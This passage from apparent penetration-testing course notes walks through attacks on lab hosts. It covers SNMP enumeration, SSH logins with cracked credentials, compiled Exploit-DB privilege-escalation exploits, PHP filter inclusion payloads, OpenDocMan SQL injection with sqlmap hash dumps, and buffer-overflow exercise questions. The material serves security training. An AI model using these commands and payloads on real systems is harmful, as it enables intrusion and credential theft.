105422/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
1055
1056
1057---------------------------Type This-----------------------------------
1058sudo nmap -sU -p69,161 172.31.2.181
1059-----------------------------------------------------------------------
1060PORT STATE SERVICE
106169/udp closed tftp
1062161/udp open snmp
1063
1064
1065---------------------------Type This-----------------------------------
1066sudo apt-get -y install onesixtyone snmp
1067
1068wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-misc/wordlist-common-snmp-community-strings.txt
1069
1070onesixtyone -c wordlist-common-snmp-community-strings.txt 172.31.2.181
1071----------------------------------------------------------------------
1072Gives error "Community string too long". A little bit of google and I found this reference: https://github.com/trailofbits/onesixtyone/issues/1
1073
1074---------------------------Type This-----------------------------------
1075cat wordlist-common-snmp-community-strings.txt | grep -v TENmanUFactOryPOWER > snmp-community-strings.txt
1076
1077onesixtyone -c snmp-community-strings.txt 172.31.2.181
1078
1079snmpwalk -Os -c public -v 1 172.31.2.181
1080---------------------------------------------------------------------
1081
1082Username "eric" found in snmpwalk, and the string "There is a house in New Orleans they call it..."
1083
1084Google the sentence, and I find out that the whole sentence is “There is a house in New Orleans they call it the rising sun”.
1085
1086Try to SSH to the box using the credentials eric:therisingsun
1087
1088
1089---------------------------Type This-----------------------------------
1090ssh -l eric 172.31.2.181
1091 therisingsun
1092
1093id
1094cat /etc/issue
1095uname -a
1096cat /etc/*release
1097
1098---------------------------Type This-----------------------------------
1099cat >> exploit.c << out
1100
1101**************paste in the content from here *****************
1102https://www.exploit-db.com/raw/39166/
1103
1104
1105------ hit enter a few times ------
1106
1107------ then type 'out' ----- this closes the file handle...
1108
1109
1110
1111---------------------------Type This-----------------------------------
1112gcc -o boom exploit.c
1113
1114./boom
1115
1116id
1117
1118
1119......YEAH - do the happy dance!!!!
1120
1121
1122
1123How to go after 172.31.2.238
1124Reference: https://t0w3ntum.com/2017/01/07/baffle/
1125
1126
1127---------------------------------------------------------------
1128sudo nmap -sV -p 3260 172.31.2.217
1129
1130
1131sudo apt install open-iscsi
1132
1133sudo iscsiadm -m discovery -t st -p 172.31.2.217
1134
1135sudo iscsiadm -m discovery -t st -p 172.31.2.217:3260
1136
1137sudo iscsiadm -m node -p 172.31.2.217 --login
1138
1139sudo /bin/bash
1140
1141fdisk -l
1142 ***** look for /dev/sda5 - Linux swap / Solaris *******
1143
1144mkdir /mnt/217vm
1145
1146mount /dev/sdb /mnt/217vm
1147
1148cd /mnt/217vm
1149
1150ls
1151
1152cat flag1.txt
1153
1154file bobsdisk.dsk
1155
1156mkdir /media/bobsdisk
1157
1158mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
1159
1160/mnt/217vm# ls
1161
1162cd /media/bobsdisk/
1163
1164ls
1165
1166cat ToAlice.eml
1167
1168file bobsdisk.dsk
1169
1170mkdir /media/bobsdisk
1171
1172mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
1173
1174/mnt/217vm# ls
1175
1176cd /media/bobsdisk/
1177
1178ls
1179
1180cat ToAlice.eml
1181
1182file ToAlice.csv.enc
1183
1184file bobsdisk.dsk
1185
1186pwd
1187
1188mkdir /media/bobsdisk
1189
1190
1191mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
1192
1193ls
1194
1195cd /media/bobsdisk/
1196
1197ls
1198
1199openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
1200
1201ls
1202
1203cat ToAlice.eml | grep flag
1204
1205openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
1206
1207ls
1208
1209cat ToAlice.eml
1210 ***** look for supercalifragilisticoespialidoso ******
1211
1212openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
1213
1214 supercalifragilisticoespialidoso
1215
1216
1217ls
1218
1219cat ToAlice.csv
1220
1221-----------------------------------------------------
1222Web Path,Reason
12235560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
1224c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
1225flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
1226
1227-----------------------------------------------------
1228
1229The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
1230http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
1231 -- view source
1232
1233Found this string in the source:
1234R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
1235ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
1236bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
1237YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
1238ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
1239YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
1240TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
1241IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
1242ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
1243IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
1244
1245------ https://www.base64decode.org/ -------
1246------ Decoded, but didn't find a flag -----
1247
1248
1249http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
1250 -- view source --
1251 -- Nothing in source --
1252
1253Browsed to the flag link:
1254view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
1255 -- view source --
1256 -- Nothing in source --
1257
1258
1259Tried a PHP base64 decode with the URL:
1260http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
1261http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
1262http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
1263
1264------ https://www.base64decode.org/ -------
1265Use the string found here:
1266http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
1267
1268-------------------------------------------------------------------
1269PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
1270-------------------------------------------------------------------
1271<?php
1272defined ('VIAINDEX') or die('Ooooh! So close..');
1273?>
1274<h1>Flag</h1>
1275<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
1276<img src="trollface.png" />
1277<?php
1278// Ok, ok. Here's your flag!
1279//
1280// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
1281//
1282// Well done, you're doing great so far!
1283// Next step. SHELL!
1284//
1285//
1286// Oh. That flag above? You're gonna need it...
1287?>
1288
1289
1290
1291
1292
1293============================================ Attacking another server because I need a reverse shell =========================================
1294---------------------------------------------------------------------------------------------------------------------------------------------------------
1295
1296Attack steps:
1297-------------
1298
1299
1300
1301Step 1: Ping sweep the target network
1302-------------------------------------
1303
1304
1305---------------------------Type This-----------------------------------
1306nmap -sP 172.31.2.0/24
1307-----------------------------------------------------------------------
1308
1309
1310
1311- Found 3 hosts
1312172.31.2.64
1313172.31.2.217
1314172.31.2.238
1315
1316
1317
1318Step 2: Port scan target system
1319-------------------------------
1320
1321
1322---------------------------Type This-----------------------------------
1323nmap -sV 172.31.2.64
1324-----------------------------------------------------------------------
1325
1326
1327
1328-------------Scan Results--------------------------------------------
1329PORT STATE SERVICE VERSION
133022/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
133180/tcp open http Apache httpd 2.4.7 ((Ubuntu))
1332514/tcp filtered shell
13331037/tcp filtered ams
13346667/tcp open irc ngircd
1335Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
1336--------------------------------------------------------------------
1337
1338
1339Step 3: Vulnerability Scan the webserver
1340----------------------------------------
1341
1342
1343---------------------------Type This-----------------------------------
1344cd ~/toolz/
1345
1346rm -rf nikto*
1347
1348git clone https://github.com/sullo/nikto.git Nikto2
1349
1350cd Nikto2/program
1351
1352perl nikto.pl -h 172.31.2.64
1353-----------------------------------------------------------------------
1354
1355
1356Step 4: Run dirbuster or similar directory bruteforce tool against the target
1357-----------------------------------------------------------------------------
1358
1359
1360---------------------------Type This-----------------------------------
1361wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
1362
1363perl Webr00t.pl -h 172.31.2.64 -v
1364-----------------------------------------------------------------------
1365 or with dirbuster (dirb)
1366
1367---------------------------Type This-----------------------------------
1368git clone https://github.com/v0re/dirb.git
1369
1370cd dirb/
1371
1372./configure
1373
1374make
1375
1376dirb
1377
1378./dirb http://172.31.2.64 wordlists/big.txt
1379-----------------------------------------------------------------------
1380
1381
1382
1383Step 5: Browse the web site to look for clues
1384---------------------------------------------
1385Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
1386
1387
1388..... really didn't get much from here so we just opened the web page in a browser
1389http://172.31.2.64/
1390
1391.....browsed to the webpage and saw that it pointed to:
1392http://172.31.2.64/jabc
1393
1394....clicked on documentation link and found hidden text that pointed to here:
1395http://172.31.2.64/jabcd0cs/
1396
1397....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
1398https://www.exploit-db.com/exploits/32075/
1399
1400Tried the sql injection described in exploit-db:
1401http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
1402
1403http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
1404
1405
1406
1407Tried to run sqlmap against the target
1408
1409
1410---------------------------Type This-----------------------------------
1411cd sqlmap-dev/
1412python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
1413
1414python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
1415
1416python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
1417
1418python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
1419
1420python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
1421-----------------------------------------------------------------------
1422
1423
1424
1425FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
1426FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
1427
1428
1429
1430---------------------------Type This-----------------------------------
1431python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
1432
1433python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
1434-----------------------------------------------------------------------
1435
1436 username: webmin
1437 hash: b78aae356709f8c31118ea613980954b
1438
1439https://hashkiller.co.uk/md5-decrypter.aspx
1440
1441 hash: b78aae356709f8c31118ea613980954b
1442 pass: webmin1980
1443
1444
1445ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
1446
1447
1448
1449---------------------------Type This-----------------------------------
1450ssh -l webmin 172.31.2.64
1451 webmin1980
1452
1453id
1454
1455cat /etc/*release
1456-----------------------------------------------------------------------
1457
1458
1459
1460....tired of not having a real command shell...
1461
1462
1463---------------------------Type This-----------------------------------
1464python -c 'import pty;pty.spawn("/bin/bash")'
1465
1466
1467cd /tmp
1468
1469pwd
1470
1471
1472cat >> exploit.c << out
1473
1474**************paste in the content from here *****************
1475https://www.exploit-db.com/raw/39166/
1476
1477
1478------ hit enter a few times ------
1479
1480------ then type 'out' ----- this closes the file handle...
1481
1482
1483
1484---------------------------Type This-----------------------------------
1485gcc -o boom exploit.c
1486
1487./boom
1488-----------------------------------------------------------------------
1489
1490
1491------------exploit failed, damn let's try another one ---------
1492
1493
1494
1495---------------------------Type This-----------------------------------
1496cat >> exploit2.c << out
1497
1498**************paste in the content from here *****************
1499https://www.exploit-db.com/raw/37292/
1500
1501
1502out
1503
1504
1505gcc -o boom2 exploit2.c
1506
1507./boom2
1508
1509id
1510
1511
1512......YEAH - do the happy dance!!!!
1513=============================================== Now back to the previous server ==============================================================
1514
1515
1516
1517
1518 #######################################
1519----------- ############### # Day 3: Intro to Exploit Development ################ -----------
1520 #######################################
1521
1522The first exploit
1523https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip
1524
1525SLMail Scripts Questions
1526
1527SLmail1.py
1528How do you start SLMail?
1529What do you have to be careful of when attaching your debugger to the application?
1530How many As are you sending to the application?
1531
1532SLmail2.py
1533What tool(s) can be used to generate a cyclic pattern?
1534What port are we attacking?
1535What verb are we attacking?
1536
1537SLmail3.py
1538What is the value contained in EIP?
1539What is the portion of the cyclic pattern that we must search for?
1540What is the distance to EIP?
1541
1542SLmail4.py
1543What do you overwrite EIP with in this script?
1544What is the length of your shellcode in this script?
1545What is the difference between SOCK_STREAM and SOCK_DGRAM?
1546
1547SLmail5.py
1548What is struct.pack and why are we using it?
1549What where is our JMP ESP coming from?
1550What is the length of our shellcode in this script?
1551
1552SLmail6.py
1553Why do you subtract the top of ESP from the bottom of ESP in this script?
1554What is the length of our shellcode in this script?
1555What is the distance to EIP in this script?
1556
1557
1558SLmail7.py
1559How do you test for bad characters?
1560What are the bad characters in this script?
1561What is the address of the JMP ESP in this script and what DLL does it come from?
1562
1563
1564SLmail8.py
1565What is DEP and how do you disable it?
1566What is the purpose of the stack adjustment?
1567What is the purpose of the NOP sled?
1568
1569
1570If you got through SLMail comfortably - then try the script below.
1571https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
1572
1573
1574Analysis of the exploit code:
1575https://www.exploit-db.com/exploits/15689/
1576What is the target platform that this exploit works against?
1577What is the variable name for the distance to EIP?
1578What is the actual distance to EIP in bytes?
1579Describe what is happening in the variable ‘junk2’?
1580
1581Analysis of the training walk-through based on EID: 15689:
1582https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
1583
1584ff1.py
1585What does the sys module do?
1586What is sys.argv[1] and sys.argv[2]?
1587What application entry point is being attacked in this script?
1588
1589ff2.py
1590Explain what is happening in lines 18 - 20
1591What is pattern_create.rb doing and where can I find it?
1592Why can’t I just double click the file to run this script?
1593
1594ff3.py
1595Explain what is happening in lines 17 - to 25?
1596Explain what is happening in lines 30 - to 32?
1597Why is everything below line 35 commented out?
1598
1599ff4.py
1600Explain what is happening in lines 13 - to 15.
1601Explain what is happening in line 19.
1602Why is everything below line 35 commented out?
1603
1604Ff5.py
1605Explain what is happening in line 15.
1606What is struct.pack?.
1607How big is the shellcode in this script?
1608
1609ff6.py
1610What is the distance to EIP?
1611How big is the shellcode in this script?
1612What is the total byte length of the data being sent to this app?
1613
1614ff7.py
1615What is a tuple in python? Unchangeable list
1616How big is the shellcode in this script? 1000 Bytes
1617Did your app crash in from this script? No
1618
1619ff8.py
1620How big is the shellcode in this script?
1621What is try/except in python?
1622What is socket.SOCK_STREAM in Python?
1623
1624ff9.py
1625What is going on in lines 19 and 20?
1626What is the length of the NOPs?
1627What is socket.SOCK_STREAM in Python?
1628
1629ff010.py
1630What is going on in lines 18 - 20?
1631How would a stack adjustment help this script?